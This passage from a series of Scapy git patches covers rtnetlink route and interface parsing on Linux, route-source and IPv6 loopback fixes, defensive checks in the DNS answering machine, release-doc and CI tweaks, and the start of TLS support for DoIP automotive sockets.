"RTA_VIA", + 0x13: "RTA_NEWDST", + 0x14: "RTA_PREF", + 0x15: "RTA_ENCAP_TYPE", + 0x16: "RTA_ENCAP", + 0x17: "RTA_EXPIRES", + 0x18: "RTA_PAD", + 0x19: "RTA_UID", + 0x1A: "RTA_TTL_PROPAGATE", + 0x1B: "RTA_IP_PROTO", + 0x1C: "RTA_SPORT", + 0x1D: "RTA_DPORT", + 0x1E: "RTA_NH_ID", + }, + fmt="=H", + ), + PadField( + MultipleTypeField( + [ + # RTA_DST, RTA_SRC, RTA_PREFSRC, RTA_GATEWAY + ( + IPField("rta_data", "0.0.0.0"), + lambda pkt: pkt.parent + and pkt.parent.rtm_family == 2 + and pkt.rta_type in [0x01, 0x02, 0x05, 0x07], + ), + ( + IP6Field("rta_data", "::"), + lambda pkt: pkt.parent + and pkt.parent.rtm_family == 10 + and pkt.rta_type in [0x01, 0x02, 0x05, 0x07], + ), + # RTS_OIF, RTA_PRIORITY + ( + Field("rta_data", 0, fmt="=I"), + lambda pkt: pkt.rta_type in [0x04, 0x06, 0x10], + ), + # RTA_TABLE + ( + EnumField("rta_data", 0, RT_CLASS, fmt="=I"), + lambda pkt: pkt.rta_type in [0x0F], + ), + ], + XStrLenField( + "rta_data", + b"", + length_from=lambda pkt: pkt.rta_len - 4, + ), + ), + align=4, + ), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + + +class rtmsg(Packet): + fields_desc = [ + ByteEnumField("rtm_family", 0, socket.AddressFamily), # type: ignore + ByteField("rtm_dst_len", 0), + ByteField("rtm_src_len", 0), + ByteField("rtm_tos", 0), + ByteEnumField( + "rtm_table", + 0, + RT_CLASS, + ), + ByteEnumField( + "rtm_protocol", + 0, + { + 0x00: "RTPROT_UNSPEC", + 0x01: "RTPROT_REDIRECT", + 0x02: "RTPROT_KERNEL", + 0x03: "RTPROT_BOOT", + 0x04: "RTPROT_STATIC", + }, + ), + ByteEnumField( + "rtm_scope", + 0, + { + 0: "RT_SCOPE_UNIVERSE", + 200: "RT_SCOPE_SITE", + 253: "RT_SCOPE_LINK", + 254: "RT_SCOPE_HOST", + 255: "RT_SCOPE_NOWHERE", + }, + ), + ByteEnumField( + "rtm_type", + 0, + { + 0x00: "RTN_UNSPEC", + 0x01: "RTN_UNICAST", + 0x02: "RTN_LOCAL", + 0x03: "RTN_BROADCAST", + 0x04: "RTN_ANYCAST", + 0x05: "RTN_MULTICAST", + 0x06: "RTN_BLACKHOLE", + 0x07: "RTN_UNREACHABLE", + 0x08: "RTN_PROHIBIT", + 0x09: "RTN_THROW", + 0x0A: "RTN_NAT", + 0x0B: "RTN_XRESOLVE", + }, + ), + FlagsField( + "rtm_flags", + 0, + 32 if BIG_ENDIAN else -32, + { + 0x100: "RTM_F_NOTIFY", + 0x200: "RTM_F_CLONED", + 0x400: "RTM_F_EQUALIZE", + 0x800: "RTM_F_PREFIX", + 0x1000: "RTM_F_LOOKUP_TABLE", + 0x2000: "RTM_F_FIB_MATCH", + 0x4000: "RTM_F_OFFLOAD", + 0x8000: "RTM_F_TRAP", + 0x20000000: "RTM_F_OFFLOAD_FAILED", + }, + ), + # Pay + PacketListField("data", [], rtmsg_rtattr), + ] + + +bind_layers(rtmsghdr, rtmsg, nlmsg_type=24) +bind_layers(rtmsghdr, rtmsg, nlmsg_type=25) +bind_layers(rtmsghdr, rtmsg, nlmsg_type=26) + + +class rtmsghdrs(Packet): + fields_desc = [ + PacketListField( + "msgs", + [], + rtmsghdr, + # 65535 / len(rtmsghdr) + max_count=4096, + ), + ] + + +# Utils + + +SOL_NETLINK = 270 +NETLINK_EXT_ACK = 11 +NETLINK_GET_STRICT_CHK = 12 + + +def _sr1_rtrequest(pkt: Packet) -> List[Packet]: + """ + Send / Receive a rtnetlink request + """ + # Create socket + sock = socket.socket( + socket.AF_NETLINK, + socket.SOCK_RAW | socket.SOCK_CLOEXEC, + socket.NETLINK_ROUTE, + ) + # Configure socket + sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 32768) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1048576) + sock.setsockopt(SOL_NETLINK, NETLINK_EXT_ACK, 1) + sock.bind((0, 0)) # bind to kernel + sock.setsockopt(SOL_NETLINK, NETLINK_GET_STRICT_CHK, 1) + # Request routes + sock.send(bytes(rtmsghdrs(msgs=[pkt]))) + results: List[Packet] = [] + try: + while True: + msgs = rtmsghdrs(sock.recv(65535)) + if not msgs: + log_loading.warning("Failed to read the routes using RTNETLINK !") + return [] + for msg in msgs.msgs: + # Keep going until we find the end of the MULTI format + if not msg.nlmsg_flags.NLM_F_MULTI or msg.nlmsg_type == 3: + if msg.nlmsg_type == 3 and nlmsgerr in msg and msg.status != 0: + # NLMSG_DONE with errors + if msg.data and msg.data[0].rta_type == 1: + log_loading.warning( + "Scapy RTNETLINK error on %s: '%s'. Please report !", + pkt.sprintf("%nlmsg_type%"), + msg.data[0].rta_data.decode(), + ) + return [] + return results + results.append(msg) + finally: + sock.close() + + +def _get_ips(af_family=socket.AF_UNSPEC): + # type: (socket.AddressFamily) -> Dict[int, List[Dict[str, Any]]] + """ + Return a mapping of all interfaces IP using a NETLINK socket. + """ + results = _sr1_rtrequest( + rtmsghdr( + nlmsg_type="RTM_GETADDR", + nlmsg_flags="NLM_F_REQUEST+NLM_F_ROOT+NLM_F_MATCH", + nlmsg_seq=int(time.time()), + ) + / ifaddrmsg( + ifa_family=af_family, + data=[], + ) + ) + ips: Dict[int, List[Dict[str, Any]]] = {} + for msg in results: + ifindex = msg.ifa_index + address = None + family = msg.ifa_family + for attr in msg.data: + if attr.rta_type == 0x01: # IFA_ADDRESS + address = attr.rta_data + break + if address is not None: + data = { + "af_family": family, + "index": ifindex, + "address": address, + } + if family == 10: # ipv6 + data["scope"] = scapy.utils6.in6_getscope(address) + ips.setdefault(ifindex, list()).append(data) + return ips + + +def _get_if_list(): + # type: () -> Dict[int, Dict[str, Any]] + """ + Read the interfaces list using a NETLINK socket. + """ + results = _sr1_rtrequest( + rtmsghdr( + nlmsg_type="RTM_GETLINK", + nlmsg_flags="NLM_F_REQUEST+NLM_F_ROOT+NLM_F_MATCH", + nlmsg_seq=int(time.time()), + ) + / ifinfomsg( + data=[], + ) + ) + lifips = _get_ips() + interfaces = {} + for msg in results: + ifindex = msg.ifi_index + ifname = None + mac = "00:00:00:00:00:00" + ifflags = msg.ifi_flags + ips = [] + for attr in msg.data: + if attr.rta_type == 0x01: # IFLA_ADDRESS + mac = attr.rta_data + elif attr.rta_type == 0x03: # IFLA_NAME + ifname = attr.rta_data[:-1].decode() + if ifname is not None: + if ifindex in lifips: + ips = lifips[ifindex] + interfaces[ifindex] = { + "name": ifname, + "index": ifindex, + "flags": ifflags, + "mac": mac, + "ips": ips, + } + return interfaces + + +def in6_getifaddr(): + # type: () -> List[Tuple[str, int, str]] + """ + Returns a list of 3-tuples of the form (addr, scope, iface) where + 'addr' is the address of scope 'scope' associated to the interface + 'iface'. + + This is the list of all addresses of all interfaces available on + the system. + """ + ips = _get_ips(af_family=socket.AF_INET6) + ifaces = _get_if_list() + result = [] + for intip in ips.values(): + for ip in intip: + if ip["index"] in ifaces: + result.append((ip["address"], ip["scope"], ifaces[ip["index"]]["name"])) + return result + + +def _read_routes(af_family): + # type: (socket.AddressFamily) -> List[Packet] + """ + Read routes using a NETLINK socket. + """ + results = [] + for rttable in ["RT_TABLE_LOCAL", "RT_TABLE_MAIN"]: + results.extend( + _sr1_rtrequest( + rtmsghdr( + nlmsg_type="RTM_GETROUTE", + nlmsg_flags="NLM_F_REQUEST+NLM_F_ROOT+NLM_F_MATCH", + nlmsg_seq=int(time.time()), + ) + / rtmsg( + rtm_family=af_family, + data=[ + rtmsg_rtattr(rta_type="RTA_TABLE", rta_data=rttable), + ], + ) + ) + ) + return [msg for msg in results if msg.nlmsg_type == 24] # RTM_NEWROUTE + + +def read_routes(): + # type: () -> List[Tuple[int, int, str, str, str, int]] + """ + Read IPv4 routes for current process + """ + routes = [] + ifaces = _get_if_list() + results = _read_routes(socket.AF_INET) + for msg in results: + # Process the RTM_NEWROUTE + net = 0 + mask = itom(msg.rtm_dst_len) + gw = "0.0.0.0" + iface = "" + addr = "0.0.0.0" + metric = 0 + for attr in msg.data: + if attr.rta_type == 0x01: # RTA_DST + net = atol(attr.rta_data) + elif attr.rta_type == 0x04: # RTS_OIF + index = attr.rta_data + if index in ifaces: + iface = ifaces[index]["name"] + else: + iface = str(index) + elif attr.rta_type == 0x05: # RTA_GATEWAY + gw = attr.rta_data + elif attr.rta_type == 0x06: # RTA_PRIORITY + metric = attr.rta_data + elif attr.rta_type == 0x07: # RTA_PREFSRC + addr = attr.rta_data + routes.append((net, mask, gw, iface, addr, metric)) + return routes + + +def read_routes6(): + # type: () -> List[Tuple[str, int, str, str, List[str], int]] + """ + Read IPv6 routes for current process + """ + routes = [] + ifaces = _get_if_list() + results = _read_routes(socket.AF_INET6) + lifaddr = _get_ips(af_family=socket.AF_INET6) + for msg in results: + # Process the RTM_NEWROUTE + prefix = "::" + plen = msg.rtm_dst_len + nh = "::" + index = 0 + iface = "" + metric = 0 + for attr in msg.data: + if attr.rta_type == 0x01: # RTA_DST + prefix = attr.rta_data + elif attr.rta_type == 0x04: # RTS_OIF + index = attr.rta_data + if index in ifaces: + iface = ifaces[index]["name"] + else: + iface = str(index) + elif attr.rta_type == 0x05: # RTA_GATEWAY + nh = attr.rta_data + elif attr.rta_type == 0x06: # RTA_PRIORITY + metric = attr.rta_data + devaddrs = ((x["address"], x["scope"], iface) for x in lifaddr.get(index, [])) + cset = scapy.utils6.construct_source_candidate_set(prefix, plen, devaddrs) + if cset: + routes.append((prefix, plen, nh, iface, cset, metric)) + return routes diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index b0a2ffd818d..90922cba490 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -35,13 +35,16 @@ ) from scapy.interfaces import NetworkInterface, InterfaceProvider, \ dev_from_index, resolve_iface, network_name -from scapy.pton_ntop import inet_ntop, inet_pton +from scapy.pton_ntop import inet_ntop from scapy.utils import atol, itom, mac2str, str2mac from scapy.utils6 import construct_source_candidate_set, in6_getscope from scapy.data import ARPHDR_ETHER from scapy.compat import plain_str from scapy.supersocket import SuperSocket +# re-export +from scapy.arch.common import get_if_raw_addr # noqa: F401 + # Typing imports from typing import ( Any, @@ -691,15 +694,6 @@ def get_ips(v6=False): return res -def get_if_raw_addr(iff): - # type: (Union[NetworkInterface, str]) -> bytes - """Return the raw IPv4 address of interface""" - iff = resolve_iface(iff) - if not iff.ip: - return b"\x00" * 4 - return inet_pton(socket.AF_INET, iff.ip) - - def get_ip_from_name(ifname, v6=False): # type: (str, bool) -> str """Backward compatibility: indirectly calls get_ips diff --git a/scapy/fields.py b/scapy/fields.py index 2ac44ff616b..eee8d6f9353 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -623,7 +623,7 @@ class PadField(_FieldContainer): __slots__ = ["fld", "_align", "_padwith"] def __init__(self, fld, align, padwith=None): - # type: (Field[Any, Any], int, Optional[bytes]) -> None + # type: (AnyField, int, Optional[bytes]) -> None self.fld = fld self._align = align self._padwith = padwith or b"\x00" diff --git a/scapy/route.py b/scapy/route.py index 9304be793d6..f01d351fb8f 100644 --- a/scapy/route.py +++ b/scapy/route.py @@ -145,8 +145,8 @@ def ifadd(self, iff, addr): the_net = the_rawaddr & the_msk self.routes.append((the_net, the_msk, '0.0.0.0', iff, the_addr, 1)) - def route(self, dst=None, verbose=conf.verb): - # type: (Optional[str], int) -> Tuple[str, str, str] + def route(self, dst=None, verbose=conf.verb, _internal=False): + # type: (Optional[str], int, bool) -> Tuple[str, str, str] """Returns the IPv4 routes to a host. parameters: - dst: the IPv4 of the destination host @@ -195,6 +195,10 @@ def route(self, dst=None, verbose=conf.verb): paths.sort(key=lambda x: (-x[0], x[1])) # Return interface ret = paths[0][2] + # Check if source is 0.0.0.0. This is a 'via' route with no src. + if ret[1] == "0.0.0.0" and not _internal: + # Then get the source from route(gw) + ret = (ret[0], self.route(ret[2], _internal=True)[1], ret[2]) self.cache[dst] = ret return ret diff --git a/scapy/utils6.py b/scapy/utils6.py index ed3f93a0462..5343cdd7106 100644 --- a/scapy/utils6.py +++ b/scapy/utils6.py @@ -85,6 +85,8 @@ def cset_sort(x, y): cset = (x for x in laddr if x[1] == IPV6_ADDR_SITELOCAL) elif addr == '::' and plen == 0: cset = (x for x in laddr if x[1] == IPV6_ADDR_GLOBAL) + elif addr == '::1': + cset = (x for x in laddr if x[1] == IPV6_ADDR_LOOPBACK) addrs = [x[0] for x in cset] # TODO convert the cmd use into a key addrs.sort(key=cmp_to_key(cset_sort)) # Sort with global addresses first diff --git a/test/linux.uts b/test/linux.uts index 33728a4c059..2a8b17374e6 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -55,8 +55,10 @@ if exit_status == 0: conf.route.resync() print(conf.route.routes) assert conf.route.route("192.0.2.43") == ("scapy0.42", "203.0.113.42", "203.0.113.41") - route_specific = (3221226027, 4294967295, "203.0.113.41", "scapy0.42", "203.0.113.42", 0) + route_specific = (3221226027, 4294967295, "203.0.113.41", "scapy0.42", "0.0.0.0", 0) assert route_specific in conf.route.routes + assert conf.route.route("203.0.113.42") == ('scapy0.42', '203.0.113.42', '0.0.0.0') + assert conf.route.route("203.0.113.43") == ('scapy0.42', '203.0.113.42', '0.0.0.0') exit_status = os.system("ip link del name dev scapy0") else: assert True @@ -77,36 +79,38 @@ with patch('scapy.arch.linux.conf.loopback_name', 'scapy_lo_x'): import os, socket from mock import patch -exit_status = os.system("ip link add name scapy_lo type dummy") -assert exit_status == 0 -exit_status = os.system("ip link set dev scapy_lo up") -assert exit_status == 0 - -with patch('scapy.arch.linux.conf.loopback_name', 'scapy_lo'): - routes = read_routes() - -exit_status = os.system("ip addr add dev scapy_lo 10.10.0.1/24") -assert exit_status == 0 - -with patch('scapy.arch.linux.conf.loopback_name', 'scapy_lo'): - routes = read_routes() - -got_lo_device = False -for route in routes: - dst_int, msk_int, gw_str, if_name, if_addr, metric = route - if if_name == 'scapy_lo': - got_lo_device = True - assert if_addr == '10.10.0.1' - dst_addr = socket.inet_ntoa(struct.pack("!I", dst_int)) - assert dst_addr == '10.10.0.0' - msk = socket.inet_ntoa(struct.pack("!I", msk_int)) - assert (msk == '255.255.255.0') - break - -assert got_lo_device - -exit_status = os.system("ip link del dev scapy_lo") -assert exit_status == 0 +try: + exit_status = os.system("ip link add name scapy_lo type dummy") + assert exit_status == 0 + exit_status = os.system("ip link set dev scapy_lo up") + assert exit_status == 0 + + with patch('scapy.arch.linux.conf.loopback_name', 'scapy_lo'): + routes = read_routes() + + exit_status = os.system("ip addr add dev scapy_lo 10.10.0.1/24") + assert exit_status == 0 + + with patch('scapy.arch.linux.conf.loopback_name', 'scapy_lo'): + routes = read_routes() + + lo_routes = [ + (ltoa(dst_int), ltoa(msk_int), gw_str, if_name, if_addr, metric) + for dst_int, msk_int, gw_str, if_name, if_addr, metric in routes + if if_name == "scapy_lo" + ] + lo_routes.sort(key=lambda x: x[0]) + + expected_routes = [ + (168427520, 4294967040, '0.0.0.0', 'scapy_lo', '10.10.0.1', 0), + (168427521, 4294967295, '0.0.0.0', 'scapy_lo', '10.10.0.1', 0), + (168427775, 4294967295, '0.0.0.0', 'scapy_lo', '10.10.0.1', 0), + ] + print(lo_routes) + print(expected_routes) +finally: + exit_status = os.system("ip link del dev scapy_lo") + assert exit_status == 0 = IPv6 link-local address selection From 0ebe56702977dc5e455ec9578c9dcc930150dff3 Mon Sep 17 00:00:00 2001 From: Pierre Date: Sun, 28 Apr 2024 20:20:27 +0200 Subject: [PATCH 1268/1632] DNS AM: add a bit of defensive programming (#4092) This fixes #4090 --- scapy/layers/dns.py | 35 +++++++++++++++++++++++++++++++---- test/answering_machines.uts | 7 +++++++ 2 files changed, 38 insertions(+), 4 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index fd53d25b22d..0a7a3b709cd 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -1520,13 +1520,37 @@ def make_reply(self, req): if IPv6 in req: resp[IPv6].underlayer.remove_payload() resp /= IPv6(dst=req[IPv6].src, src=self.src_ip6 or req[IPv6].dst) - else: + elif IP in req: resp[IP].underlayer.remove_payload() resp /= IP(dst=req[IP].src, src=self.src_ip or req[IP].dst) - resp /= UDP(sport=req.dport, dport=req.sport) + else: + warning("No IP or IPv6 layer in %s", req.command()) + return + try: + resp /= UDP(sport=req[UDP].dport, dport=req[UDP].sport) + except IndexError: + warning("No UDP layer in %s", req.command(), exc_info=True) + return ans = [] - req = req.getlayer(self.cls) - for rq in req.qd: + try: + req = req[self.cls] + except IndexError: + warning( + "No %s layer in %s", + self.cls.__name__, + req.command(), + exc_info=True, + ) + return + try: + queries = req.qd + except AttributeError: + warning("No qd attribute in %s", req.command(), exc_info=True) + return + for rq in queries: + if isinstance(rq, Raw): + warning("Cannot parse qd element %s", rq.command(), exc_info=True) + continue if rq.qtype in [1, 28]: # A or AAAA if rq.qtype == 28: @@ -1598,6 +1622,9 @@ def make_reply(self, req): # Error break else: + if not ans: + # No rq was actually answered, as none was valid. Discard. + return # All rq were answered resp /= self.cls(id=req.id, qr=1, qd=req.qd, an=ans) return resp diff --git a/test/answering_machines.uts b/test/answering_machines.uts index d737e58945c..b1bcdfe2913 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -119,6 +119,13 @@ test_am(DNS_am, match={"google.com": ("127.0.0.1", "::1"), "gaagle.com": "128.0.0.1"}, joker=False) +assert DNS_am().make_reply(Ether()) is None +assert DNS_am().make_reply(Ether()/IP()) is None +assert DNS_am().make_reply(Ether()/IP()/UDP()) is None +assert DNS_am().make_reply( + Ether()/IP()/UDP()/DNS(b'q\xa04\x00\x00\xa0\x01\x00\xf3\x00\x01\x04\x01y') +) is None + = DHCPv6_am - Basic Instantiaion ~ osx netaccess a = DHCPv6_am() From ac3d5bb645639225ad8416476872f9d311ba8ca7 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 28 Apr 2024 21:42:08 +0200 Subject: [PATCH 1269/1632] Improve release doc (#4369) --- doc/scapy/development.rst | 19 ++++++++++++------- pyproject.toml | 9 +++++---- 2 files changed, 17 insertions(+), 11 deletions(-) diff --git a/doc/scapy/development.rst b/doc/scapy/development.rst index 0ac03e3df48..3c2fcda23d5 100644 --- a/doc/scapy/development.rst +++ b/doc/scapy/development.rst @@ -293,23 +293,28 @@ signing a commit, the maintainer that wishes to create a release must: Taking v2.4.3 as an example, the following commands can be used to sign and publish the release:: - git tag -s v2.4.3 -m "Release 2.4.3" - git tag v2.4.3 -v - git push --tags + $ git tag -s v2.4.3 -m "Release 2.4.3" + $ git tag v2.4.3 -v + $ git push --tags Release Candidates (RC) could also be done. For example, the first RC will be tagged v2.4.3rc1 and the message ``2.4.3 Release Candidate #1``. +.. note:: + To add a signing key, configure to use a SSH one, then register it via:: + $ git config --global gpg.format ssh + $ git config --global user.signingkey ~/.ssh/examplekey.pub + Prior to uploading the release to PyPi, the mail address of the maintainer performing the release must be added next to his name in ``pyproject.toml``. See `this `_ for details. The following commands can then be used:: - pip install --upgrade build - python -m build - twine check dist/* - twine upload dist/* + $ pip install --upgrade build + $ SCAPY_VERSION=2.6.0rc1 python -m build + $ twine check dist/* + $ twine upload dist/* .. warning:: Make sure that you don't have left-overs in your ``dist/`` folder ! There should only be the source and the wheel for the package. diff --git a/pyproject.toml b/pyproject.toml index 92f1734adc9..b0637e583f2 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -41,10 +41,11 @@ classifiers = [ ] [project.urls] -homepage = "https://scapy.net" -documentation = "https://scapy.readthedocs.io" -repository = "https://github.com/secdev/scapy" -changelog = "https://github.com/secdev/scapy/releases" +Homepage = "https://scapy.net" +Download = "https://github.com/secdev/scapy/tarball/master" +Documentation = "https://scapy.readthedocs.io" +"Source Code" = "https://github.com/secdev/scapy" +Changelog = "https://github.com/secdev/scapy/releases" [project.scripts] scapy = "scapy.main:interact" From 19eeee54ef167cc41fe7847fb8e4556c95b98f79 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Wed, 1 May 2024 02:01:49 +0000 Subject: [PATCH 1270/1632] ci: bring back the manufdb tests now that https://github.com/secdev/scapy/pull/4351 is merged and https://github.com/secdev/scapy/issues/4280 is closed. and also run the netaccess tests. It's a follow-up to 86c7a05a1430a47a24d45705784b2e113fb3149d. --- .packit.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.packit.yml b/.packit.yml index 43cbb64b72a..02799b5f54f 100644 --- a/.packit.yml +++ b/.packit.yml @@ -17,7 +17,7 @@ actions: - "git clone https://src.fedoraproject.org/rpms/scapy .packit_rpm --depth=1" # Drop the "sources" file so rebase-helper doesn't think we're a dist-git - "rm -fv .packit_rpm/sources" - - "sed -i '/^# check$/a%check\\n./test/run_tests -c test/configs/linux.utsc -K netaccess -K scanner -K manufdb' .packit_rpm/scapy.spec" + - "sed -i '/^# check$/a%check\\n./test/run_tests -c test/configs/linux.utsc -K scanner' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: can-utils' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: libpcap' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: openssl' .packit_rpm/scapy.spec" @@ -40,6 +40,7 @@ jobs: - job: copr_build trigger: pull_request manual_trigger: true + enable_net: true targets: - fedora-latest-stable-aarch64 - fedora-latest-stable-i386 From 8cea357bad0226bbdec55a3477d1e8082baf08bb Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 1 May 2024 17:08:55 +0200 Subject: [PATCH 1271/1632] Add SSL support for DoIP sockets (#4327) * Add SSL functionality to DoIP sockets * Cleanup DoIP Sockets to not have tons of different objects --- scapy/contrib/automotive/doip.py | 243 +++++++++++++++++------- test/contrib/automotive/doip.uts | 313 +++++++++++++++++++++++++++++++ 2 files changed, 491 insertions(+), 65 deletions(-) diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index ba66ef8a84d..f81049ca96e 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -11,6 +11,7 @@ import struct import socket import time +import ssl from scapy.contrib.automotive import log_automotive from scapy.fields import ( @@ -27,7 +28,7 @@ XStrField, ) from scapy.packet import Packet, bind_layers, bind_bottom_up -from scapy.supersocket import StreamSocket +from scapy.supersocket import StreamSocket, SSLStreamSocket from scapy.layers.inet import TCP, UDP from scapy.contrib.automotive.uds import UDS from scapy.data import MTU @@ -39,6 +40,7 @@ Optional, ) + # ISO 13400-2 sect 9.2 @@ -247,8 +249,8 @@ def post_build(self, pkt, pay): This will set the Field 'payload_length' to the correct value. """ if self.payload_length is None: - pkt = pkt[:4] + struct.pack("!I", len(pay) + len(pkt) - 8) + \ - pkt[8:] + pkt = pkt[:4] + struct.pack( + "!I", len(pay) + len(pkt) - 8) + pkt[8:] return pkt + pay def extract_padding(self, s): @@ -259,13 +261,24 @@ def extract_padding(self, s): return b"", None -class DoIPSocket(StreamSocket): - """ Custom StreamSocket for DoIP communication. This sockets automatically - sends a routing activation request as soon as a TCP connection is +bind_bottom_up(UDP, DoIP, sport=13400) +bind_bottom_up(UDP, DoIP, dport=13400) +bind_layers(UDP, DoIP, sport=13400, dport=13400) + +bind_layers(TCP, DoIP, sport=13400) +bind_layers(TCP, DoIP, dport=13400) + +bind_layers(DoIP, UDS, payload_type=0x8001) + + +class DoIPSocket(SSLStreamSocket): + """Socket for DoIP communication. This sockets automatically + sends a routing activation request as soon as a TCP or TLS connection is established. :param ip: IP address of destination :param port: destination port, usually 13400 + :param tls_port: destination port for TLS connection, usually 3496 :param activate_routing: If true, routing activation request is automatically sent :param source_address: DoIP source address @@ -275,69 +288,137 @@ class DoIPSocket(StreamSocket): the routing activation request :param reserved_oem: Optional parameter to set value for reserved_oem field of routing activation request + :param force_tls: Skip establishing of a TCP connection and directly try to + connect via SSL/TLS + :param context: Optional ssl.SSLContext object for initialization of ssl socket + connections. Example: >>> socket = DoIPSocket("169.254.0.131") >>> pkt = DoIP(payload_type=0x8001, source_address=0xe80, target_address=0x1000) / UDS() / UDS_RDBI(identifiers=[0x1000]) >>> resp = socket.sr1(pkt, timeout=1) """ # noqa: E501 - def __init__(self, ip='127.0.0.1', port=13400, activate_routing=True, - source_address=0xe80, target_address=0, - activation_type=0, reserved_oem=b""): - # type: (str, int, bool, int, int, int, bytes) -> None + + def __init__(self, + ip='127.0.0.1', # type: str + port=13400, # type: int + tls_port=3496, # type: int + activate_routing=True, # type: bool + source_address=0xe80, # type: int + target_address=0, # type: int + activation_type=0, # type: int + reserved_oem=b"", # type: bytes + force_tls=False, # type: bool + context=None # type: Optional[ssl.SSLContext] + ): # type: (...) -> None self.ip = ip self.port = port + self.tls_port = tls_port + self.activate_routing = activate_routing self.source_address = source_address + self.target_address = target_address + self.activation_type = activation_type + self.reserved_oem = reserved_oem self.buffer = b"" - self._init_socket() - - if activate_routing: - self._activate_routing( - source_address, target_address, activation_type, reserved_oem) + self.force_tls = force_tls + self.context = context + try: + self._init_socket(socket.AF_INET) + except Exception: + self.close() + raise def recv(self, x=MTU, **kwargs): # type: (Optional[int], **Any) -> Optional[Packet] - if self.buffer: - len_data = self.buffer[:8] - else: - len_data = self.ins.recv(8, socket.MSG_PEEK) - if len(len_data) != 8: - return None + if len(self.buffer) < 8: + self.buffer += self.ins.recv(8) + if len(self.buffer) < 8: + return None + len_data = self.buffer[:8] len_int = struct.unpack(">I", len_data[4:8])[0] len_int += 8 - self.buffer += self.ins.recv(len_int - len(self.buffer)) - if len(self.buffer) != len_int: + self.buffer += self.ins.recv(len_int - len(self.buffer)) + if len(self.buffer) < len_int: return None + pktbuf = self.buffer[:len_int] + self.buffer = self.buffer[len_int:] - pkt = self.basecls(self.buffer, **kwargs) # type: Packet - self.buffer = b"" + pkt = self.basecls(pktbuf, **kwargs) # type: Packet return pkt def _init_socket(self, sock_family=socket.AF_INET): # type: (int) -> None + connected = False s = socket.socket(sock_family, socket.SOCK_STREAM) + s.settimeout(5) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - addrinfo = socket.getaddrinfo(self.ip, self.port, proto=socket.IPPROTO_TCP) - s.connect(addrinfo[0][-1]) - StreamSocket.__init__(self, s, DoIP) - - def _activate_routing(self, - source_address, # type: int - target_address, # type: int - activation_type, # type: int - reserved_oem=b"" # type: bytes - ): # type: (...) -> None + + if not self.force_tls: + addrinfo = socket.getaddrinfo(self.ip, self.port, proto=socket.IPPROTO_TCP) + s.connect(addrinfo[0][-1]) + connected = True + SSLStreamSocket.__init__(self, s, DoIP) + + if not self.activate_routing: + return + + activation_return = self._activate_routing() + else: + # Let's overwrite activation_return to force TLS Connection + activation_return = 0x07 + + if activation_return == 0x10: + # Routing successfully activated. + return + elif activation_return == 0x07: + # Routing activation denied because the specified activation + # type requires a secure TLS TCP_DATA socket. + if self.context is None: + raise ValueError("SSLContext 'context' can not be None") + if connected: + s.close() + s = socket.socket(sock_family, socket.SOCK_STREAM) + s.settimeout(5) + s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) + s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + + ss = self.context.wrap_socket(s) + addrinfo = socket.getaddrinfo( + self.ip, self.tls_port, proto=socket.IPPROTO_TCP) + ss.connect(addrinfo[0][-1]) + SSLStreamSocket.__init__(self, ss, DoIP) + + if not self.activate_routing: + return + + activation_return = self._activate_routing() + if activation_return == 0x10: + # Routing successfully activated. + return + else: + raise Exception( + "DoIPSocket activate_routing failed with " + "routing_activation_response 0x%x" % activation_return) + + elif activation_return == -1: + raise Exception("DoIPSocket._activate_routing failed") + else: + raise Exception( + "DoIPSocket activate_routing failed with " + "routing_activation_response 0x%x!" % activation_return) + + def _activate_routing(self): # type: (...) -> int resp = self.sr1( - DoIP(payload_type=0x5, activation_type=activation_type, - source_address=source_address, reserved_oem=reserved_oem), + DoIP(payload_type=0x5, activation_type=self.activation_type, + source_address=self.source_address, reserved_oem=self.reserved_oem), verbose=False, timeout=1) if resp and resp.payload_type == 0x6 and \ resp.routing_activation_response == 0x10: - self.target_address = target_address or \ - resp.logical_address_doip_entity + self.target_address = ( + self.target_address or resp.logical_address_doip_entity) log_automotive.info( "Routing activation successful! Target address set to: 0x%x", self.target_address) @@ -345,14 +426,20 @@ def _activate_routing(self, log_automotive.error( "Routing activation failed! Response: %s", repr(resp)) + if resp and resp.payload_type == 0x6: + return resp.routing_activation_response + else: + return -1 + class DoIPSocket6(DoIPSocket): - """ Custom StreamSocket for DoIP communication over IPv6. - This sockets automatically sends a routing activation request as soon as - a TCP connection is established. + """Socket for DoIP communication. This sockets automatically + sends a routing activation request as soon as a TCP or TLS connection is + established. :param ip: IPv6 address of destination :param port: destination port, usually 13400 + :param tls_port: destination port for TLS connection, usually 3496 :param activate_routing: If true, routing activation request is automatically sent :param source_address: DoIP source address @@ -362,6 +449,10 @@ class DoIPSocket6(DoIPSocket): the routing activation request :param reserved_oem: Optional parameter to set value for reserved_oem field of routing activation request + :param force_tls: Skip establishing of a TCP connection and directly try to + connect via SSL/TLS + :param context: Optional ssl.SSLContext object for initialization of ssl socket + connections. Example: >>> socket = 